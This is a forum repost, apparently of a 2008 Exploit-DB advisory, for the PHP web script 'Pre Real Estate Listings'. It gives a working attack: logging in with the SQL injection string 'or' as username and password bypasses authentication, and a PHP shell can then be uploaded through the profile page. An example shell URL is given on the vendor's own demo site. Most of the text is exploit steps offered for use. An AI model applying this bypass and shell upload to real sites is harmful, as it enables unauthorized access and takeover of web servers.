Exploit Pre Real Estate Listings - Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7094
Проверка EDB
  1. Пройдено
Автор
BACKDOOR
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-7052 cve-2008-6798
Дата публикации
2008-11-11
Код:
Pre Real Estate Listings (login.php) ByPass /File Upload
Script:Pre Real Estate Listings
HomePage:http://preproject.com/
Demo:http://preproject.com/ulisting/
Author:BackDoor
By Pass Exploit:
http://victim.com/scriptpath/login.php username:'or' password:'or'
Live Demo:
http://preproject.com/ulisting/login.php
File Upload Exploit:
login live demo username:'or' password:'or'
Edit Your Profile Link:http://preproject.com/ulisting/profile.php
Upload Your Shell:
Example:
http://preproject.com/ulisting/re_images/1221553817_logo_wp.php
 
Cyber-Security TIM //Lojistik

# milw0rm.com [2008-11-11]
 
Источник
www.exploit-db.com

Похожие темы